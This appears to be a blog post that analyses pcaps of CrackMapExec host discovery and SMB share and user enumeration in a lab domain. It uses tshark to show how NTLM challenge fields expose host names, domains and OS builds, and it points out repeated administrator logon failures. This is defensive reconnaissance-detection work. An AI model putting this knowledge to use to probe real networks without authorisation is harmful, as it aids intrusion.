Let's now take a look at the packets which are generated when crackmapexec is executed on our network
Here is the tcpdump filter which was configured to capture the traffic. The "-w" will change as I will have each crackmapexec command in its own pcap.
root@securitynik:~# tcpdump -nnvvi eth0 'not port (9997 or 8089 or 8191 or 8000 or 8065 or 68 or 67)' -w cme-scan.pcap
Now that we have the file named "cme-scan.pcap", let's perform our packet analysis on this.
As always, when running tshark (or wireshark) one of the first things we should do is look at the protocol statistics. We can achieve this as follows:
root@securitynik:~# tshark -n -r cme-scan.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:1570 bytes:72502
arp frames:1521 bytes:64188
ip frames:49 bytes:8314
tcp frames:48 bytes:8244
nbss frames:28 bytes:6940
smb frames:3 bytes:381
smb2 frames:25 bytes:6559
icmp frames:1 bytes:70
===================================================================
Let's look into the TCP traffic by first looking at the conversations
root@securitynik:~# tshark -n -r cme-scan.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:34564 <-> 10.0.0.105:445 9 1598 10 1166 19 2764 10.223046000 10.5146
10.0.0.100:39670 <-> 10.0.0.3:445 6 1669 8 1030 14 2699 7.135418000 0.0369
10.0.0.100:50874 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 7.174715000 0.0219
10.0.0.100:50838 <-> 10.0.0.2:445 0 0 1 74 1 74 7.135206000 0.0000
================================================================================
Interestingly in the results returned from crackmapexec, there are 3 hosts in the results. However, above we see 4 conversations with port 445. Let's remove the bottom one as it returns a total of 74 bytes, while the top 3 has over 1000 bytes.
To make this a bit easier on ourselves, let's leverage a tshark filter that only focuses on the first conversation with source port 34564 and destination port 445.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.port == 34564) and (tcp.port == 445)"
388 10.223046 10.0.0.100 → 10.0.0.105 TCP 74 34564 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2851720854 TSecr=0 WS=128
391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
392 10.223423 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
395 10.224501 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
400 10.225566 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
420 10.231080 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
444 10.238197 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
447 10.243642 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
449 10.247201 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
453 10.279577 10.0.0.100 → 10.0.0.105 TCP 66 34564 → 445 [ACK] Seq=595 Ack=1017 Win=32512 Len=0 SLE=945 SRE=1017
1565 20.735709 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [FIN, ACK] Seq=595 Ack=1017 Win=32512 Len=0
1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
Now that we have the above, we have an insight into what the communication looks like. We can see the TCP 3-way handshake has been completed and then we see the SMB session negotiated and processed, followed by the TCP connection being gracefully terminated.
Now if we were to look into the "Session Setup Response Message" for the NTLMSSP_NEGOTIATE (Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE), as shown in record number 446, we should be able to gather information into how crackmapexec was able to determine the operating system, etc. Let's take a look at specific fields in the "Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE" packet to bring some clarity into this. Let's also adjust our tshark filter, to now only look at traffic coming back from the 3 devices found, while ignoring the ICMP frame. We will revisit the 1521 frames which show up in the protocol hierarchy shortly, but work with me for now.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.srcport == 445) && !(icmp)"
11 7.135744 10.0.0.3 → 10.0.0.100 TCP 66 445 → 39670 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
14 7.137411 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
39 7.145265 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
63 7.154134 10.0.0.3 → 10.0.0.100 SMB2 401 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
87 7.163947 10.0.0.3 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
111 7.172290 10.0.0.3 → 10.0.0.100 TCP 60 445 → 39670 [RST, ACK] Seq=1328 Ack=579 Win=0 Len=0
122 7.174930 10.0.0.103 → 10.0.0.100 TCP 66 445 → 50874 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
125 7.182170 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
128 7.185537 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
130 7.189042 10.0.0.103 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
132 7.194414 10.0.0.103 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
134 7.196617 10.0.0.103 → 10.0.0.100 TCP 60 445 → 50874 [RST, ACK] Seq=1336 Ack=579 Win=0 Len=0
391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
As we can see from above, we have a few response packets from the hosts at 10.0.0.3, 10.0.0.103 and 10.0.0.105. These matches with what crackmapexec found so far. let's now look into the specific fields to show how it learned the information it displayed. Before looking at the specific fields, let's take record number 446 and expand it to see some of the fields.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(frame.number == 446)" -T text -V
Frame 446: 409 bytes on wire (3272 bits), 409 bytes captured (3272 bits)
Encapsulation type: Ethernet (1)
Arrival Time: Apr 7, 2019 23:12:40.690090000 EDT
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1554693160.690090000 seconds
[Time delta from previous captured frame: 0.000516000 seconds]
[Time delta from previous displayed frame: 0.000000000 seconds]
[Time since reference or first frame: 10.238929000 seconds]
Frame Number: 446
Frame Length: 409 bytes (3272 bits)
Capture Length: 409 bytes (3272 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp:nbss:smb2:gss-api:spnego:ntlmssp]
Ethernet II, Src: 08:00:27:d1:1c:e7, Dst: 08:00:27:ac:14:9c
Destination: 08:00:27:ac:14:9c
Address: 08:00:27:ac:14:9c
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: 08:00:27:d1:1c:e7
Address: 08:00:27:d1:1c:e7
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.0.105, Dst: 10.0.0.100
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 395
Identification: 0x515e (20830)
Flags: 0x4000, Don't fragment
0... .... .... .... = Reserved bit: Not set
.1.. .... .... .... = Don't fragment: Set
..0. .... .... .... = More fragments: Not set
...0 0000 0000 0000 = Fragment offset: 0
Time to live: 128
Protocol: TCP (6)
Header checksum: 0x9342 [validation disabled]
[Header checksum status: Unverified]
Source: 10.0.0.105
Destination: 10.0.0.100
Transmission Control Protocol, Src Port: 445, Dst Port: 34564, Seq: 505, Ack: 342, Len: 355
Source Port: 445
Destination Port: 34564
[Stream index: 3]
[TCP Segment Len: 355]
Sequence number: 505 (relative sequence number)
[Next sequence number: 860 (relative sequence number)]
Acknowledgment number: 342 (relative ack number)
0101 .... = Header Length: 20 bytes (5)
Flags: 0x018 (PSH, ACK)
000. .... .... = Reserved: Not set
...0 .... .... = Nonce: Not set
.... 0... .... = Congestion Window Reduced (CWR): Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...1 .... = Acknowledgment: Set
.... .... 1... = Push: Set
.... .... .0.. = Reset: Not set
.... .... ..0. = Syn: Not set
.... .... ...0 = Fin: Not set
[TCP Flags: ·······AP···]
Window size value: 8211
[Calculated window size: 2102016]
[Window size scaling factor: 256]
Checksum: 0x10ec [unverified]
[Checksum Status: Unverified]
Urgent pointer: 0
[SEQ/ACK analysis]
[This is an ACK to the segment in frame: 444]
[The RTT to ACK the segment was: 0.000732000 seconds]
[iRTT: 0.000377000 seconds]
[Bytes in flight: 355]
[Bytes sent since last PSH flag: 355]
[Timestamps]
[Time since first frame in this TCP stream: 0.015883000 seconds]
[Time since previous frame in this TCP stream: 0.000732000 seconds]
TCP payload (355 bytes)
NetBIOS Session Service
Message Type: Session message (0x00)
Length: 351
SMB2 (Server Message Block Protocol version 2)
SMB2 Header
Server Component: SMB2
Header Length: 64
Credit Charge: 1
NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016)
Command: Session Setup (1)
Credits granted: 1
Flags: 0x00000001, Response
.... .... .... .... .... .... .... ...1 = Response: This is a RESPONSE
.... .... .... .... .... .... .... ..0. = Async command: This is a SYNC command
.... .... .... .... .... .... .... .0.. = Chained: This pdu is NOT a chained command
.... .... .... .... .... .... .... 0... = Signing: This pdu is NOT signed
.... .... .... .... .... .... .000 .... = Priority: This pdu does NOT contain a PRIORITY1
...0 .... .... .... .... .... .... .... = DFS operation: This is a normal operation
..0. .... .... .... .... .... .... .... = Replay operation: This is NOT a replay operation
Chain Offset: 0x00000000
Message ID: Unknown (2)
Process Id: 0x00000000
Tree Id: 0x00000000
Session Id: 0x000048000000003d
Signature: 00000000000000000000000000000000
[Response to: 444]
[Time from request: 0.000732000 seconds]
Session Setup Response (0x01)
StructureSize: 0x0009
0000 0000 0000 100. = Fixed Part Length: 4
.... .... .... ...1 = Dynamic Part: True
Session Flags: 0x0000
.... .... .... ...0 = Guest: False
.... .... .... ..0. = Null: False
.... .... .... .0.. = Encrypt: False
Blob Offset: 0x00000048
Blob Length: 279
Security Blob: a18201133082010fa0030a0101a10c060a2b060104018237...
GSS-API Generic Security Service Application Program Interface
Simple Protected Negotiation
negTokenTarg
negResult: accept-incomplete (1)
supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider)
responseToken: 4e544c4d53535000020000001600160038000000358289e2...
NTLM Secure Service Provider
NTLMSSP identifier: NTLMSSP
NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
Target Name: SECURITYNIK
Length: 22
Maxlen: 22
Offset: 56
Negotiate Flags: 0xe2898235, Negotiate 56, Negotiate Key Exchange, Negotiate 128, Negotiate Version, Negotiate Target Info, Negotiate Extended Security, Target Type Domain, Negotiate Always Sign, Negotiate NTLM key, Negotiate Seal, Negotia
1... .... .... .... .... .... .... .... = Negotiate 56: Set
.1.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Set
..1. .... .... .... .... .... .... .... = Negotiate 128: Set
...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set
.... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set
.... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set
.... ..1. .... .... .... .... .... .... = Negotiate Version: Set
.... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set
.... .... 1... .... .... .... .... .... = Negotiate Target Info: Set
.... .... .0.. .... .... .... .... .... = Request Non-NT Session: Not set
.... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set
.... .... ...0 .... .... .... .... .... = Negotiate Identify: Not set
.... .... .... 1... .... .... .... .... = Negotiate Extended Security: Set
.... .... .... .0.. .... .... .... .... = Target Type Share: Not set
.... .... .... ..0. .... .... .... .... = Target Type Server: Not set
.... .... .... ...1 .... .... .... .... = Target Type Domain: Set
.... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set
.... .... .... .... .0.. .... .... .... = Negotiate 0x00004000: Not set
.... .... .... .... ..0. .... .... .... = Negotiate OEM Workstation Supplied: Not set
.... .... .... .... ...0 .... .... .... = Negotiate OEM Domain Supplied: Not set
.... .... .... .... .... 0... .... .... = Negotiate Anonymous: Not set
.... .... .... .... .... .0.. .... .... = Negotiate NT Only: Not set
.... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set
.... .... .... .... .... ...0 .... .... = Negotiate 0x00000100: Not set
.... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set
.... .... .... .... .... .... .0.. .... = Negotiate Datagram: Not set
.... .... .... .... .... .... ..1. .... = Negotiate Seal: Set
.... .... .... .... .... .... ...1 .... = Negotiate Sign: Set
.... .... .... .... .... .... .... 0... = Request 0x00000008: Not set
.... .... .... .... .... .... .... .1.. = Request Target: Set
.... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set
.... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set
NTLM Server Challenge: 67f26f829961c6cf
Reserved: 0000000000000000
Target Info
Length: 168
Maxlen: 168
Offset: 78
Attribute: NetBIOS domain name: SECURITYNIK
Target Info Item Type: NetBIOS domain name (0x0002)
Target Info Item Length: 22
NetBIOS Domain Name: SECURITYNIK
Attribute: NetBIOS computer name: SECNIK-2K19
Target Info Item Type: NetBIOS computer name (0x0001)
Target Info Item Length: 22
NetBIOS Computer Name: SECNIK-2K19
Attribute: DNS domain name: securitynik.local
Target Info Item Type: DNS domain name (0x0004)
Target Info Item Length: 34
DNS Domain Name: securitynik.local
Attribute: DNS computer name: SECNIK-2K19.securitynik.local
Target Info Item Type: DNS computer name (0x0003)
Target Info Item Length: 58
DNS Computer Name: SECNIK-2K19.securitynik.local
Attribute: Timestamp
Target Info Item Type: Timestamp (0x0007)
Target Info Item Length: 8
Timestamp: Apr 7, 2019 23:12:40.658449900 EDT
Attribute: End of list
Target Info Item Type: End of list (0x0000)
Target Info Item Length: 0
Version 10.0 (Build 17763); NTLM Current Revision 15
Major Version: 10
Minor Version: 0
Build Number: 17763
NTLM Current Revision: 15
From above, we literally broke out all the fields for this packet. As you can see, a lot of this information which crackmapexec saw is already visible. Let's now prepare to wrap this part of it up by extracting those fields and presenting them in a more user-friendly manner.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(ntlmssp.messagetype == 0x00000002)" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e ntlmssp.identifier -e ntlmssp.challenge.target_name -e ntlmssp.challenge.target_info.nb_domain_name -e ntlmssp.version.major -e ntlmssp.version.build_number -E header=y
ip.src tcp.srcport ip.dst tcp.dstport ntlmssp.identifier ntlmssp.challenge.target_name ntlmssp.challenge.target_info.nb_domain_name ntlmssp.version.major ntlmssp.version.build_number
10.0.0.3 445 10.0.0.100 39670 NTLMSSP SECURITYNIK-SYS SECURITYNIK-SYS 10 17763
10.0.0.103 445 10.0.0.100 50874 NTLMSSP SECURITYNIK-WIN SECURITYNIK-WIN 10 16299
10.0.0.105 445 10.0.0.100 34564 NTLMSSP SECURITYNIK SECURITYNIK 10 17763
Obviously, you should now try to extract some of the other fields that I did not include.
Before we go, if we remember when we looked at the protocol hierarchy, above there were ARP packets. Let's see what we can gather from these.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" | wc --lines
1521
From above, it looks like we have 1521 ICMP messages. Let's see what is really going on here. To help us understand what is going on, let's once again, look into the fields and parse the information of interest out.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" -T fields -e arp.src.hw_mac -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y | more
arp.src.hw_mac arp.src.proto_ipv4 arp.dst.proto_ipv4 arp.opcode
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.1 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.4 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.5 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.6 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.7 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.8 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.9 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.10 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.49 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.50 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.51 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.52 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.53 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.54 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.55 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.56 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.57 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.58 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.59 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.11 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.12 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.13 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.14 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.15 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.16 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.17 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.18 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.21 1
.... <truncated for brevity> ....
Let's now look at what the packets look like as CrackMapExec enumerates the shares
Let's once again start with looking at the protocol hierarchy
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:487 bytes:131203
arp frames:5 bytes:300
ip frames:482 bytes:130903
tcp frames:482 bytes:130903
nbss frames:394 bytes:115138
smb frames:8 bytes:1016
smb2 frames:386 bytes:114122
tcp.segments frames:2 bytes:2764
===================================================================
From above we see both SMB and SMB2 conversations. I take that to mean that the conversation probably started on SMB1 the negotiated to SMB2.
Let's look into the conversations.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:35710 <-> 10.0.0.105:445 88 32754 95 19205 183 51959 4.701908000 1.3409
10.0.0.100:52026 <-> 10.0.0.103:445 77 32785 88 19170 165 51955 4.702229000 1.3245
10.0.0.100:41024 <-> 10.0.0.3:445 13 3322 17 3681 30 7003 4.778967000 1.2455
10.0.0.100:35716 <-> 10.0.0.105:445 14 2952 15 2945 29 5897 4.797176000 1.2259
10.0.0.100:52032 <-> 10.0.0.103:445 13 3074 15 2883 28 5957 5.162347000 0.8619
10.0.0.100:35708 <-> 10.0.0.105:445 8 1512 10 1154 18 2666 4.658157000 1.3651
10.0.0.100:41016 <-> 10.0.0.3:445 7 1729 8 1030 15 2759 4.657942000 0.1189
10.0.0.100:52018 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 4.657751000 0.0437
================================================================================
Let's do like the previous instance and look into one of the conversations. Let's take the first one with source port 35710.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -Y "( ip.addr == 10.0.0.100 ) && ( ip.addr == 10.0.0.105 ) && ( tcp.port ==35710 ) && ( tcp.port == 445 )" | more
35 4.701908 10.0.0.100 → 10.0.0.105 TCP 74 35710 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2860773415 TSecr=0 WS=128
37 4.702292 10.0.0.105 → 10.0.0.100 TCP 66 445 → 35710 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
38 4.702307 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
41 4.703211 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
44 4.706059 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
45 4.706077 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
48 4.709555 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
49 4.710187 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
52 4.719150 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
53 4.719743 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
56 4.728556 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
57 4.731502 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
59 4.734839 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
62 4.736363 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
63 4.753927 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
64 4.756372 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
68 4.760402 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
69 4.761060 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
72 4.772888 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
74 4.775421 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
76 4.778370 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
78 4.779050 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
81 4.786392 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
85 4.789841 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
103 4.829145 10.0.0.105 → 10.0.0.100 TCP 139 [TCP Retransmission] 445 → 35710 [PSH, ACK] Seq=2313 Ack=3016 Win=2100736 Len=85
104 4.829160 10.0.0.100 → 10.0.0.105 TCP 66 35710 → 445 [ACK] Seq=3016 Ack=2398 Win=35712 Len=0 SLE=2313 SRE=2398
118 4.870576 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
119 4.870976 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
120 4.870995 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=3178 Ack=2534 Win=36736 Len=0
...........
463 5.966266 10.0.0.105 → 10.0.0.100 SMB2 182 Encrypted SMB3
464 5.970495 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
465 5.970824 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
468 6.013389 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=14032 Ack=27752 Win=185856 Len=0
484 6.040763 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [FIN, ACK] Seq=14032 Ack=27752 Win=185856 Len=0
485 6.041096 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [ACK] Seq=27752 Ack=14033 Win=2102272 Len=0
486 6.042828 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [RST, ACK] Seq=27752 Ack=14033 Win=0 Len=0
Uh oh!! Looks like this communication is encrypted with SMB3. However, if you pay close attention above, we see a number of "STATUS_LOGON_FAILURE" for "SECURITYNIK\Administrator". Let's leave this for now. Do note also most of the other conversations are much the same.
Let's now transition to the enumeration of the users and groups, to see what we can learn from the packets.
Looking at the traffic from the user enumeration, if we start with the conversations, we see 10 conversations being reported in the pcap file. if we look at the first one with port 36662, we see this ties back into our log analysis. Let's take a look at these packets to see what we can learn.
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:36662 <-> 10.0.0.105:445 81 20594 78 18654 159 39248 9.171767000 1.2807
10.0.0.100:52980 <-> 10.0.0.103:445 58 15862 60 14173 118 30035 9.321117000 0.6187
10.0.0.100:36660 <-> 10.0.0.105:445 13 2714 15 2933 28 5647 9.060796000 1.3251
10.0.0.100:52978 <-> 10.0.0.103:445 13 3074 15 2887 28 5961 9.208452000 1.1786
10.0.0.100:36652 <-> 10.0.0.105:445 9 1638 10 1166 19 2804 8.944584000 1.5418
10.0.0.100:41964 <-> 10.0.0.3:445 7 1729 11 1451 18 3180 8.997733000 1.4911
10.0.0.100:52972 <-> 10.0.0.103:445 7 1746 11 1459 18 3205 8.998512000 1.4915
10.0.0.100:36656 <-> 10.0.0.105:445 8 1525 9 1409 17 2934 8.998254000 1.5223
10.0.0.100:52962 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 8.944150000 0.0536
10.0.0.100:41960 <-> 10.0.0.3:445 6 1669 8 1030 14 2699 8.944373000 0.0425
================================================================================
Looking at the actual packets now
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -Y "( tcp.port == 36662 ) && ( tcp.port == 445 )"
109 9.171767 10.0.0.100 → 10.0.0.105 TCP 74 36662 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2872505954 TSecr=0 WS=128
110 9.172057 10.0.0.105 → 10.0.0.100 TCP 66 445 → 36662 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
111 9.172070 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
113 9.180091 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
115 9.193928 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=1 Ack=74 Win=2102272 Len=0
130 9.223667 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
131 9.223681 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
135 9.230843 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
143 9.256814 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=253 Ack=184 Win=2102272 Len=0
